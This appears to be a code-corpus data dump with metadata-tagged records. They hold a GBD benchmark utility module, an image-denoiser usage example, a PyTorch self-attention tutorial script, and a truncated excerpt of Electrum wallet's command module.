self._extMetaData = extMetaData
sourceModule = ""
parentModules = ""
_contentType = []
contentType = property(get_contentType, set_contentType)
charset = property(get_charset, set_charset)
filename = property(get_filename, set_filename)
ephID = property(get_ephID, set_ephID)
uniqID = property(get_uniqID, set_uniqID)
timestamp = property(get_timestamp, set_timestamp)
source = property(get_source, set_source)
flags = ""
parent = ""
depth = 0
rootUID = ""
origRootUID = property(get_origRootUID, set_origRootUID)
extMetaData = property(get_extMetaData, set_extMetaData)
submitID = property(get_submitID, set_submitID)
submitter = property(get_submitter, set_submitter)
comment = property(get_comment, set_comment)
extArgs = property(get_extArgs, set_extArgs)
| true
| true
|
1c492d7823e57027410a6a13a82d1f14a113d5cc
| 2,796
|
py
|
Python
|
gbd_tool/util.py
|
Weitspringer/gbd
|
fed29b9f15167553e93af9a1a88aa6782c761e15
|
[
"MIT"
] | null | null | null |
gbd_tool/util.py
|
Weitspringer/gbd
|
fed29b9f15167553e93af9a1a88aa6782c761e15
|
[
"MIT"
] | null | null | null |
gbd_tool/util.py
|
Weitspringer/gbd
|
fed29b9f15167553e93af9a1a88aa6782c761e15
|
[
"MIT"
] | 1
|
2019-03-11T17:34:27.000Z
|
2019-03-11T17:34:27.000Z
|
# Global Benchmark Database (GBD)
# Copyright (C) 2020 Markus Iser, Karlsruhe Institute of Technology (KIT)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import bz2
import gzip
import lzma
import io
__all__ = ['eprint', 'read_hashes', 'confirm', 'open_cnf_file', 'is_number']
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
def open_cnf_file(filename, mode):
"""
Opens a CNF file (this is badly guarded, by file-extension only)
"""
obj = None
if filename.endswith('.cnf.gz'):
obj = gzip.open(filename, mode)
elif filename.endswith('.cnf.bz2'):
obj = bz2.open(filename, mode)
elif filename.endswith('.cnf.lzma') or filename.endswith('.cnf.xz'):
obj = lzma.open(filename, mode)
elif filename.endswith('.cnf'):
obj = open(filename, mode)
else:
raise Exception("Unknown File Extension. Use .cnf, .cnf.bz2, .cnf.lzma, .cnf.xz, or .cnf.gz")
if 'b' in mode:
return io.BufferedReader(obj, io.DEFAULT_BUFFER_SIZE * 8)
else:
return obj
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def read_hashes():
eprint("Reading hashes from stdin ...")
hashes = list()
try:
while True:
line = sys.stdin.readline().split()
if len(line) == 0:
return hashes
hashes.extend(line)
except KeyboardInterrupt:
return hashes
return hashes
def confirm(prompt='Confirm', resp=False):
"""
prompts for yes or no response from the user. Returns True for yes and False for no.
'resp' should be set to the default value assumed by the caller when user simply types ENTER.
"""
if resp:
prompt = '%s [%s]|%s: ' % (prompt, 'y', 'n')
else:
prompt = '%s [%s]|%s: ' % (prompt, 'n', 'y')
while True:
ans = input(prompt)
if not ans:
return resp
if ans not in ['y', 'Y', 'n', 'N']:
print('please enter y or n.')
continue
if ans == 'y' or ans == 'Y':
return True
if ans == 'n' or ans == 'N':
return False
| 29.744681
| 101
| 0.616595
|
import sys
import bz2
import gzip
import lzma
import io
__all__ = ['eprint', 'read_hashes', 'confirm', 'open_cnf_file', 'is_number']
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
def open_cnf_file(filename, mode):
obj = None
if filename.endswith('.cnf.gz'):
obj = gzip.open(filename, mode)
elif filename.endswith('.cnf.bz2'):
obj = bz2.open(filename, mode)
elif filename.endswith('.cnf.lzma') or filename.endswith('.cnf.xz'):
obj = lzma.open(filename, mode)
elif filename.endswith('.cnf'):
obj = open(filename, mode)
else:
raise Exception("Unknown File Extension. Use .cnf, .cnf.bz2, .cnf.lzma, .cnf.xz, or .cnf.gz")
if 'b' in mode:
return io.BufferedReader(obj, io.DEFAULT_BUFFER_SIZE * 8)
else:
return obj
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def read_hashes():
eprint("Reading hashes from stdin ...")
hashes = list()
try:
while True:
line = sys.stdin.readline().split()
if len(line) == 0:
return hashes
hashes.extend(line)
except KeyboardInterrupt:
return hashes
return hashes
def confirm(prompt='Confirm', resp=False):
if resp:
prompt = '%s [%s]|%s: ' % (prompt, 'y', 'n')
else:
prompt = '%s [%s]|%s: ' % (prompt, 'n', 'y')
while True:
ans = input(prompt)
if not ans:
return resp
if ans not in ['y', 'Y', 'n', 'N']:
print('please enter y or n.')
continue
if ans == 'y' or ans == 'Y':
return True
if ans == 'n' or ans == 'N':
return False
| true
| true
|
1c492e2bffd7ccc7f803675a75443d0ae9f21d29
| 832
|
py
|
Python
|
example_denoiser.py
|
Jeffrey-Ede/Electron-Micrograph-Denoiser
|
23e4fa6a79540d9ce8e294d12623e972e3b9b584
|
[
"MIT"
] | 9
|
2018-08-25T20:28:48.000Z
|
2021-09-26T11:01:04.000Z
|
example_denoiser.py
|
Jeffrey-Ede/Electron-Micrograph-Denoiser
|
23e4fa6a79540d9ce8e294d12623e972e3b9b584
|
[
"MIT"
] | null | null | null |
example_denoiser.py
|
Jeffrey-Ede/Electron-Micrograph-Denoiser
|
23e4fa6a79540d9ce8e294d12623e972e3b9b584
|
[
"MIT"
] | 2
|
2019-07-02T02:21:44.000Z
|
2021-02-21T01:38:48.000Z
|
import numpy as np
from denoiser import Denoiser, disp
#Create a 1500x1500 image from random numbers for demonstration
#Try replacing this with your own image!
img = np.random.rand(1500, 1500)
#Replace with the location of your saved checkpoint
checkpoint_loc = "//flexo.ads.warwick.ac.uk/Shared41/Microscopy/Jeffrey-Ede/models/denoiser-multi-gpu-13/model"
#Initialize the denoising neural network
noise_remover = Denoiser(checkpoint_loc=checkpoint_loc, visible_cuda="0")
#Denoise a 512x512 crop from the image
crop = img[:512,:512]
denoised_crop = noise_remover.denoise_crop(crop)
#Denoise the entire image
denoised_img = noise_remover.denoise(img)
disp(crop) #Crop before denoising
disp(denoised_crop) #Crop after denoising
disp(img) #Image before denoising
disp(denoised_img) #Image after denoising
| 33.28
| 112
| 0.78125
|
import numpy as np
from denoiser import Denoiser, disp
img = np.random.rand(1500, 1500)
checkpoint_loc = "//flexo.ads.warwick.ac.uk/Shared41/Microscopy/Jeffrey-Ede/models/denoiser-multi-gpu-13/model"
noise_remover = Denoiser(checkpoint_loc=checkpoint_loc, visible_cuda="0")
crop = img[:512,:512]
denoised_crop = noise_remover.denoise_crop(crop)
denoised_img = noise_remover.denoise(img)
disp(crop) disp(denoised_crop) disp(img) disp(denoised_img)
| true
| true
|
1c492f160e5e930221c363008f27a84a830d7761
| 7,425
|
py
|
Python
|
ch16/ch16-part1-self-attention.py
|
ericgarza70/machine-learning-book
|
073bebee7d4f7803cc4b7f790bd18d11cdb4c901
|
[
"MIT"
] | 655
|
2021-12-19T00:33:00.000Z
|
2022-03-31T16:30:36.000Z
|
ch16/ch16-part1-self-attention.py
|
Topmost2020/machine-learning-book
|
40520104c3d76d75ce4aa785e59e8034f74bcc8e
|
[
"MIT"
] | 41
|
2022-01-14T14:22:02.000Z
|
2022-03-31T16:26:09.000Z
|
ch16/ch16-part1-self-attention.py
|
Topmost2020/machine-learning-book
|
40520104c3d76d75ce4aa785e59e8034f74bcc8e
|
[
"MIT"
] | 180
|
2021-12-20T07:05:42.000Z
|
2022-03-31T07:38:20.000Z
|
# coding: utf-8
import sys
from python_environment_check import check_packages
import torch
import torch.nn.functional as F
# # Machine Learning with PyTorch and Scikit-Learn
# # -- Code Examples
# ## Package version checks
# Add folder to path in order to load from the check_packages.py script:
sys.path.insert(0, '..')
# Check recommended package versions:
d = {
'torch': '1.9.0',
}
check_packages(d)
# # Chapter 16: Transformers – Improving Natural Language Processing with Attention Mechanisms (Part 1/3)
# **Outline**
#
# - [Adding an attention mechanism to RNNs](#Adding-an-attention-mechanism-to-RNNs)
# - [Attention helps RNNs with accessing information](#Attention-helps-RNNs-with-accessing-information)
# - [The original attention mechanism for RNNs](#The-original-attention-mechanism-for-RNNs)
# - [Processing the inputs using a bidirectional RNN](#Processing-the-inputs-using-a-bidirectional-RNN)
# - [Generating outputs from context vectors](#Generating-outputs-from-context-vectors)
# - [Computing the attention weights](#Computing-the-attention-weights)
# - [Introducing the self-attention mechanism](#Introducing-the-self-attention-mechanism)
# - [Starting with a basic form of self-attention](#Starting-with-a-basic-form-of-self-attention)
# - [Parameterizing the self-attention mechanism: scaled dot-product attention](#Parameterizing-the-self-attention-mechanism-scaled-dot-product-attention)
# - [Attention is all we need: introducing the original transformer architecture](#Attention-is-all-we-need-introducing-the-original-transformer-architecture)
# - [Encoding context embeddings via multi-head attention](#Encoding-context-embeddings-via-multi-head-attention)
# - [Learning a language model: decoder and masked multi-head attention](#Learning-a-language-model-decoder-and-masked-multi-head-attention)
# - [Implementation details: positional encodings and layer normalization](#Implementation-details-positional-encodings-and-layer-normalization)
# ## Adding an attention mechanism to RNNs
# ### Attention helps RNNs with accessing information
# ### The original attention mechanism for RNNs
# ### Processing the inputs using a bidirectional RNN
# ### Generating outputs from context vectors
# ### Computing the attention weights
# ## Introducing the self-attention mechanism
# ### Starting with a basic form of self-attention
# - Assume we have an input sentence that we encoded via a dictionary, which maps the words to integers as discussed in the RNN chapter:
# input sequence / sentence:
# "Can you help me to translate this sentence"
sentence = torch.tensor(
[0, # can
7, # you
1, # help
2, # me
5, # to
6, # translate
4, # this
3] # sentence
)
sentence
# - Next, assume we have an embedding of the words, i.e., the words are represented as real vectors.
# - Since we have 8 words, there will be 8 vectors. Each vector is 16-dimensional:
torch.manual_seed(123)
embed = torch.nn.Embedding(10, 16)
embedded_sentence = embed(sentence).detach()
embedded_sentence.shape
# - The goal is to compute the context vectors $\boldsymbol{z}^{(i)}=\sum_{j=1}^{T} \alpha_{i j} \boldsymbol{x}^{(j)}$, which involve attention weights $\alpha_{i j}$.
# - In turn, the attention weights $\alpha_{i j}$ involve the $\omega_{i j}$ values
# - Let's start with the $\omega_{i j}$'s first, which are computed as dot-products:
#
# $$\omega_{i j}=\boldsymbol{x}^{(i)^{\top}} \boldsymbol{x}^{(j)}$$
#
#
omega = torch.empty(8, 8)
for i, x_i in enumerate(embedded_sentence):
for j, x_j in enumerate(embedded_sentence):
omega[i, j] = torch.dot(x_i, x_j)
# - Actually, let's compute this more efficiently by replacing the nested for-loops with a matrix multiplication:
omega_mat = embedded_sentence.matmul(embedded_sentence.T)
torch.allclose(omega_mat, omega)
# - Next, let's compute the attention weights by normalizing the "omega" values so they sum to 1
#
# $$\alpha_{i j}=\frac{\exp \left(\omega_{i j}\right)}{\sum_{j=1}^{T} \exp \left(\omega_{i j}\right)}=\operatorname{softmax}\left(\left[\omega_{i j}\right]_{j=1 \ldots T}\right)$$
#
# $$\sum_{j=1}^{T} \alpha_{i j}=1$$
attention_weights = F.softmax(omega, dim=1)
attention_weights.shape
# - We can conform that the columns sum up to one:
attention_weights.sum(dim=1)
# - Now that we have the attention weights, we can compute the context vectors $\boldsymbol{z}^{(i)}=\sum_{j=1}^{T} \alpha_{i j} \boldsymbol{x}^{(j)}$, which involve attention weights $\alpha_{i j}$
# - For instance, to compute the context-vector of the 2nd input element (the element at index 1), we can perform the following computation:
x_2 = embedded_sentence[1, :]
context_vec_2 = torch.zeros(x_2.shape)
for j in range(8):
x_j = embedded_sentence[j, :]
context_vec_2 += attention_weights[1, j] * x_j
context_vec_2
# - Or, more effiently, using linear algebra and matrix multiplication:
context_vectors = torch.matmul(
attention_weights, embedded_sentence)
torch.allclose(context_vec_2, context_vectors[1])
# ### Parameterizing the self-attention mechanism: scaled dot-product attention
torch.manual_seed(123)
d = embedded_sentence.shape[1]
U_query = torch.rand(d, d)
U_key = torch.rand(d, d)
U_value = torch.rand(d, d)
x_2 = embedded_sentence[1]
query_2 = U_query.matmul(x_2)
key_2 = U_key.matmul(x_2)
value_2 = U_value.matmul(x_2)
keys = U_key.matmul(embedded_sentence.T).T
torch.allclose(key_2, keys[1])
values = U_value.matmul(embedded_sentence.T).T
torch.allclose(value_2, values[1])
omega_23 = query_2.dot(keys[2])
omega_23
omega_2 = query_2.matmul(keys.T)
omega_2
attention_weights_2 = F.softmax(omega_2 / d**0.5, dim=0)
attention_weights_2
#context_vector_2nd = torch.zeros(values[1, :].shape)
#for j in range(8):
# context_vector_2nd += attention_weights_2[j] * values[j, :]
#context_vector_2nd
context_vector_2 = attention_weights_2.matmul(values)
context_vector_2
# ## Attention is all we need: introducing the original transformer architecture
# ### Encoding context embeddings via multi-head attention
torch.manual_seed(123)
d = embedded_sentence.shape[1]
one_U_query = torch.rand(d, d)
h = 8
multihead_U_query = torch.rand(h, d, d)
multihead_U_key = torch.rand(h, d, d)
multihead_U_value = torch.rand(h, d, d)
multihead_query_2 = multihead_U_query.matmul(x_2)
multihead_query_2.shape
multihead_key_2 = multihead_U_key.matmul(x_2)
multihead_value_2 = multihead_U_value.matmul(x_2)
multihead_key_2[2]
stacked_inputs = embedded_sentence.T.repeat(8, 1, 1)
stacked_inputs.shape
multihead_keys = torch.bmm(multihead_U_key, stacked_inputs)
multihead_keys.shape
multihead_keys = multihead_keys.permute(0, 2, 1)
multihead_keys.shape
multihead_keys[2, 1] # index: [2nd attention head, 2nd key]
multihead_values = torch.matmul(multihead_U_value, stacked_inputs)
multihead_values = multihead_values.permute(0, 2, 1)
multihead_z_2 = torch.rand(8, 16)
linear = torch.nn.Linear(8*16, 16)
context_vector_2 = linear(multihead_z_2.flatten())
context_vector_2.shape
# ### Learning a language model: decoder and masked multi-head attention
# ### Implementation details: positional encodings and layer normalization
# ---
#
# Readers may ignore the next cell.
| 19.74734
| 198
| 0.724444
|
import sys
from python_environment_check import check_packages
import torch
import torch.nn.functional as F
sys.path.insert(0, '..')
d = {
'torch': '1.9.0',
}
check_packages(d)
sentence = torch.tensor(
[0, 7, 1, 2, 5, 6, 4, 3] )
sentence
torch.manual_seed(123)
embed = torch.nn.Embedding(10, 16)
embedded_sentence = embed(sentence).detach()
embedded_sentence.shape
omega = torch.empty(8, 8)
for i, x_i in enumerate(embedded_sentence):
for j, x_j in enumerate(embedded_sentence):
omega[i, j] = torch.dot(x_i, x_j)
omega_mat = embedded_sentence.matmul(embedded_sentence.T)
torch.allclose(omega_mat, omega)
# - Next, let's compute the attention weights by normalizing the "omega" values so they sum to 1
attention_weights = F.softmax(omega, dim=1)
attention_weights.shape
attention_weights.sum(dim=1)
x_2 = embedded_sentence[1, :]
context_vec_2 = torch.zeros(x_2.shape)
for j in range(8):
x_j = embedded_sentence[j, :]
context_vec_2 += attention_weights[1, j] * x_j
context_vec_2
context_vectors = torch.matmul(
attention_weights, embedded_sentence)
torch.allclose(context_vec_2, context_vectors[1])
torch.manual_seed(123)
d = embedded_sentence.shape[1]
U_query = torch.rand(d, d)
U_key = torch.rand(d, d)
U_value = torch.rand(d, d)
x_2 = embedded_sentence[1]
query_2 = U_query.matmul(x_2)
key_2 = U_key.matmul(x_2)
value_2 = U_value.matmul(x_2)
keys = U_key.matmul(embedded_sentence.T).T
torch.allclose(key_2, keys[1])
values = U_value.matmul(embedded_sentence.T).T
torch.allclose(value_2, values[1])
omega_23 = query_2.dot(keys[2])
omega_23
omega_2 = query_2.matmul(keys.T)
omega_2
attention_weights_2 = F.softmax(omega_2 / d**0.5, dim=0)
attention_weights_2
context_vector_2 = attention_weights_2.matmul(values)
context_vector_2
torch.manual_seed(123)
d = embedded_sentence.shape[1]
one_U_query = torch.rand(d, d)
h = 8
multihead_U_query = torch.rand(h, d, d)
multihead_U_key = torch.rand(h, d, d)
multihead_U_value = torch.rand(h, d, d)
multihead_query_2 = multihead_U_query.matmul(x_2)
multihead_query_2.shape
multihead_key_2 = multihead_U_key.matmul(x_2)
multihead_value_2 = multihead_U_value.matmul(x_2)
multihead_key_2[2]
stacked_inputs = embedded_sentence.T.repeat(8, 1, 1)
stacked_inputs.shape
multihead_keys = torch.bmm(multihead_U_key, stacked_inputs)
multihead_keys.shape
multihead_keys = multihead_keys.permute(0, 2, 1)
multihead_keys.shape
multihead_keys[2, 1]
multihead_values = torch.matmul(multihead_U_value, stacked_inputs)
multihead_values = multihead_values.permute(0, 2, 1)
multihead_z_2 = torch.rand(8, 16)
linear = torch.nn.Linear(8*16, 16)
context_vector_2 = linear(multihead_z_2.flatten())
context_vector_2.shape
| true
| true
|
1c49318bff6d5183bcc5c2c6c25c9a5820e01828
| 35,956
|
py
|
Python
|
lib/commands.py
|
Bryangoodson/electrum-vtc-tor
|
8e80ee8aff59fc62db93646ba980b37a2ed81e38
|
[
"MIT"
] | 1
|
2021-04-04T20:40:29.000Z
|
2021-04-04T20:40:29.000Z
|
lib/commands.py
|
Bryangoodson/electrum-vtc-tor
|
8e80ee8aff59fc62db93646ba980b37a2ed81e38
|
[
"MIT"
] | null | null | null |
lib/commands.py
|
Bryangoodson/electrum-vtc-tor
|
8e80ee8aff59fc62db93646ba980b37a2ed81e38
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import datetime
import time
import copy
import argparse
import json
import ast
import base64
from functools import wraps
from decimal import Decimal
import util
from util import print_msg, format_satoshis, print_stderr
import bitcoin
from bitcoin import is_address, hash_160, COIN, TYPE_ADDRESS
import transaction
from transaction import Transaction
import paymentrequest
from paymentrequest import PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
import contacts
known_commands = {}
def satoshis(amount):
# satoshi conversion must not be performed by the parser
return int(COIN*Decimal(amount)) if amount not in ['!', None] else amount
class Command:
def __init__(self, func, s):
self.name = func.__name__
self.requires_network = 'n' in s
self.requires_wallet = 'w' in s
self.requires_password = 'p' in s
self.description = func.__doc__
self.help = self.description.split('.')[0] if self.description else None
varnames = func.func_code.co_varnames[1:func.func_code.co_argcount]
self.defaults = func.func_defaults
if self.defaults:
n = len(self.defaults)
self.params = list(varnames[:-n])
self.options = list(varnames[-n:])
else:
self.params = list(varnames)
self.options = []
self.defaults = []
def command(s):
def decorator(func):
global known_commands
name = func.__name__
known_commands[name] = Command(func, s)
@wraps(func)
def func_wrapper(*args, **kwargs):
c = known_commands[func.__name__]
if c.requires_wallet and args[0].wallet is None:
raise BaseException("wallet not loaded. Use 'electrum-ltc daemon load_wallet'")
return func(*args, **kwargs)
return func_wrapper
return decorator
class Commands:
def __init__(self, config, wallet, network, callback = None):
self.config = config
self.wallet = wallet
self.network = network
self._callback = callback
def _run(self, method, args, password_getter):
# this wrapper is called from the python console
cmd = known_commands[method]
if cmd.requires_password and self.wallet.has_password():
password = password_getter()
if password is None:
return
else:
password = None
f = getattr(self, method)
if cmd.requires_password:
result = f(*args, **{'password':password})
else:
result = f(*args)
if self._callback:
self._callback()
return result
@command('')
def commands(self):
"""List of commands"""
return ' '.join(sorted(known_commands.keys()))
@command('')
def create(self):
"""Create a new wallet"""
raise BaseException('Not a JSON-RPC command')
@command('wn')
def restore(self, text):
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of Vertcoin addresses
or Vertcoin private keys. If you want to be prompted for your
seed, type '?' or ':' (concealed) """
raise BaseException('Not a JSON-RPC command')
@command('wp')
def password(self, password=None, new_password=None):
"""Change wallet password. """
self.wallet.update_password(password, new_password)
self.wallet.storage.write()
return {'password':self.wallet.has_password()}
@command('')
def getconfig(self, key):
"""Return a configuration variable. """
return self.config.get(key)
@command('')
def setconfig(self, key, value):
"""Set a configuration variable. 'value' may be a string or a Python expression."""
try:
value = ast.literal_eval(value)
except:
pass
self.config.set_key(key, value)
return True
@command('')
def make_seed(self, nbits=132, entropy=1, language=None):
"""Create a seed"""
from mnemonic import Mnemonic
s = Mnemonic(language).make_seed('standard', nbits, custom_entropy=entropy)
return s.encode('utf8')
@command('')
def check_seed(self, seed, entropy=1, language=None):
"""Check that a seed was generated with given entropy"""
from mnemonic import Mnemonic
return Mnemonic(language).check_seed(seed, entropy)
@command('n')
def getaddresshistory(self, address):
"""Return the transaction history of any address. Note: This is a
walletless server query, results are not checked by SPV.
"""
return self.network.synchronous_get(('blockchain.address.get_history', [address]))
@command('w')
def listunspent(self):
"""List unspent outputs. Returns the list of unspent transaction
outputs in your wallet."""
l = copy.deepcopy(self.wallet.get_utxos(exclude_frozen=False))
for i in l:
v = i["value"]
i["value"] = float(v)/COIN if v is not None else None
return l
@command('n')
def getaddressunspent(self, address):
"""Returns the UTXO list of any address. Note: This
is a walletless server query, results are not checked by SPV.
"""
return self.network.synchronous_get(('blockchain.address.listunspent', [address]))
@command('n')
def getutxoaddress(self, txid, pos):
"""Get the address of a UTXO. Note: This is a walletless server query, results are
not checked by SPV.
"""
r = self.network.synchronous_get(('blockchain.utxo.get_address', [txid, pos]))
return {'address': r}
@command('')
def serialize(self, jsontx):
"""Create a transaction from json inputs.
Inputs must have a redeemPubkey.
Outputs must be a list of {'address':address, 'value':satoshi_amount}.
"""
keypairs = {}
inputs = jsontx.get('inputs')
outputs = jsontx.get('outputs')
locktime = jsontx.get('locktime', 0)
for txin in inputs:
if txin.get('output'):
prevout_hash, prevout_n = txin['output'].split(':')
txin['prevout_n'] = int(prevout_n)
txin['prevout_hash'] = prevout_hash
if txin.get('redeemPubkey'):
pubkey = txin['redeemPubkey']
txin['type'] = 'p2pkh'
txin['x_pubkeys'] = [pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
if txin.get('privkey'):
keypairs[pubkey] = txin['privkey']
elif txin.get('redeemScript'):
raise BaseException('Not implemented')
outputs = map(lambda x: (TYPE_ADDRESS, x['address'], int(x['value'])), outputs)
tx = Transaction.from_io(inputs, outputs, locktime=locktime)
tx.sign(keypairs)
return tx.as_dict()
@command('wp')
def signtransaction(self, tx, privkey=None, password=None):
"""Sign a transaction. The wallet keys will be used unless a private key is provided."""
tx = Transaction(tx)
if privkey:
pubkey = bitcoin.public_key_from_private_key(privkey)
h160 = bitcoin.hash_160(pubkey.decode('hex'))
x_pubkey = 'fd' + (chr(0) + h160).encode('hex')
tx.sign({x_pubkey:privkey})
else:
self.wallet.sign_transaction(tx, password)
return tx.as_dict()
@command('')
def deserialize(self, tx):
"""Deserialize a serialized transaction"""
tx = Transaction(tx)
return tx.deserialize()
@command('n')
def broadcast(self, tx, timeout=30):
"""Broadcast a transaction to the network. """
tx = Transaction(tx)
return self.network.broadcast(tx, timeout)
@command('')
def createmultisig(self, num, pubkeys):
"""Create multisig address"""
assert isinstance(pubkeys, list), (type(num), type(pubkeys))
redeem_script = transaction.multisig_script(pubkeys, num)
address = bitcoin.hash160_to_p2sh(hash_160(redeem_script.decode('hex')))
return {'address':address, 'redeemScript':redeem_script}
@command('w')
def freeze(self, address):
"""Freeze address. Freeze the funds at one of your wallet\'s addresses"""
return self.wallet.set_frozen_state([address], True)
@command('w')
def unfreeze(self, address):
"""Unfreeze address. Unfreeze the funds at one of your wallet\'s address"""
return self.wallet.set_frozen_state([address], False)
@command('wp')
def getprivatekeys(self, address, password=None):
"""Get private keys of addresses. You may pass a single wallet address, or a list of wallet addresses."""
if is_address(address):
return self.wallet.get_private_key(address, password)
domain = address
return [self.wallet.get_private_key(address, password) for address in domain]
@command('w')
def ismine(self, address):
"""Check if address is in wallet. Return true if and only address is in wallet"""
return self.wallet.is_mine(address)
@command('')
def dumpprivkeys(self):
"""Deprecated."""
return "This command is deprecated. Use a pipe instead: 'electrum-vtc listaddresses | electrum-vtc getprivatekeys - '"
@command('')
def validateaddress(self, address):
"""Check that an address is valid. """
return is_address(address)
@command('w')
def getpubkeys(self, address):
"""Return the public keys for a wallet address. """
return self.wallet.get_public_keys(address)
@command('w')
def getbalance(self):
"""Return the balance of your wallet. """
c, u, x = self.wallet.get_balance()
out = {"confirmed": str(Decimal(c)/COIN)}
if u:
out["unconfirmed"] = str(Decimal(u)/COIN)
if x:
out["unmatured"] = str(Decimal(x)/COIN)
return out
@command('n')
def getaddressbalance(self, address):
"""Return the balance of any address. Note: This is a walletless
server query, results are not checked by SPV.
"""
out = self.network.synchronous_get(('blockchain.address.get_balance', [address]))
out["confirmed"] = str(Decimal(out["confirmed"])/COIN)
out["unconfirmed"] = str(Decimal(out["unconfirmed"])/COIN)
return out
@command('n')
def getproof(self, address):
"""Get Merkle branch of an address in the UTXO set"""
p = self.network.synchronous_get(('blockchain.address.get_proof', [address]))
out = []
for i,s in p:
out.append(i)
return out
@command('n')
def getmerkle(self, txid, height):
"""Get Merkle branch of a transaction included in a block. Electrum
uses this to verify transactions (Simple Payment Verification)."""
return self.network.synchronous_get(('blockchain.transaction.get_merkle', [txid, int(height)]))
@command('n')
def getservers(self):
"""Return the list of available servers"""
return self.network.get_servers()
@command('')
def version(self):
"""Return the version of electrum."""
from version import ELECTRUM_VERSION
return ELECTRUM_VERSION
@command('w')
def getmpk(self):
"""Get master public key. Return your wallet\'s master public key"""
return self.wallet.get_master_public_key()
@command('wp')
def getmasterprivate(self, password=None):
"""Get master private key. Return your wallet\'s master private key"""
return str(self.wallet.keystore.get_master_private_key(password))
@command('wp')
def getseed(self, password=None):
"""Get seed phrase. Print the generation seed of your wallet."""
s = self.wallet.get_seed(password)
return s.encode('utf8')
@command('wp')
def importprivkey(self, privkey, password=None):
"""Import a private key. """
if not self.wallet.can_import_privkey():
return "Error: This type of wallet cannot import private keys. Try to create a new wallet with that key."
try:
addr = self.wallet.import_key(privkey, password)
out = "Keypair imported: " + addr
except BaseException as e:
out = "Error: " + str(e)
return out
def _resolver(self, x):
if x is None:
return None
out = self.wallet.contacts.resolve(x)
if out.get('type') == 'openalias' and self.nocheck is False and out.get('validated') is False:
raise BaseException('cannot verify alias', x)
return out['address']
@command('nw')
def sweep(self, privkey, destination, tx_fee=None, nocheck=False, imax=100):
"""Sweep private keys. Returns a transaction that spends UTXOs from
privkey to a destination address. The transaction is not
broadcasted."""
tx_fee = satoshis(tx_fee)
privkeys = privkey if type(privkey) is list else [privkey]
self.nocheck = nocheck
dest = self._resolver(destination)
tx = self.wallet.sweep(privkeys, self.network, self.config, dest, tx_fee, imax)
return tx.as_dict() if tx else None
@command('wp')
def signmessage(self, address, message, password=None):
"""Sign a message with a key. Use quotes if your message contains
whitespaces"""
sig = self.wallet.sign_message(address, message, password)
return base64.b64encode(sig)
@command('')
def verifymessage(self, address, signature, message):
"""Verify a signature."""
sig = base64.b64decode(signature)
return bitcoin.verify_message(address, sig, message)
def _mktx(self, outputs, fee, change_addr, domain, nocheck, unsigned, rbf, password, locktime=None):
self.nocheck = nocheck
change_addr = self._resolver(change_addr)
domain = None if domain is None else map(self._resolver, domain)
final_outputs = []
for address, amount in outputs:
address = self._resolver(address)
amount = satoshis(amount)
final_outputs.append((TYPE_ADDRESS, address, amount))
coins = self.wallet.get_spendable_coins(domain, self.config)
tx = self.wallet.make_unsigned_transaction(coins, final_outputs, self.config, fee, change_addr)
if locktime != None:
tx.locktime = locktime
if rbf:
tx.set_rbf(True)
if not unsigned:
self.wallet.sign_transaction(tx, password)
return tx
@command('wp')
def payto(self, destination, amount, tx_fee=None, from_addr=None, change_addr=None, nocheck=False, unsigned=False, rbf=False, password=None, locktime=None):
"""Create a transaction. """
tx_fee = satoshis(tx_fee)
domain = [from_addr] if from_addr else None
tx = self._mktx([(destination, amount)], tx_fee, change_addr, domain, nocheck, unsigned, rbf, password, locktime)
return tx.as_dict()
@command('wp')
def paytomany(self, outputs, tx_fee=None, from_addr=None, change_addr=None, nocheck=False, unsigned=False, rbf=False, password=None, locktime=None):
"""Create a multi-output transaction. """
tx_fee = satoshis(tx_fee)
domain = [from_addr] if from_addr else None
tx = self._mktx(outputs, tx_fee, change_addr, domain, nocheck, unsigned, rbf, password, locktime)
return tx.as_dict()
@command('w')
def history(self):
"""Wallet history. Returns the transaction history of your wallet."""
balance = 0
out = []
for item in self.wallet.get_history():
tx_hash, height, conf, timestamp, value, balance = item
if timestamp:
date = datetime.datetime.fromtimestamp(timestamp).isoformat(' ')[:-3]
else:
date = "----"
label = self.wallet.get_label(tx_hash)
tx = self.wallet.transactions.get(tx_hash)
tx.deserialize()
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr == None: continue
if addr == "(pubkey)":
prevout_hash = x.get('prevout_hash')
prevout_n = x.get('prevout_n')
_addr = self.wallet.find_pay_to_pubkey_address(prevout_hash, prevout_n)
if _addr:
addr = _addr
input_addresses.append(addr)
for addr, v in tx.get_outputs():
output_addresses.append(addr)
out.append({
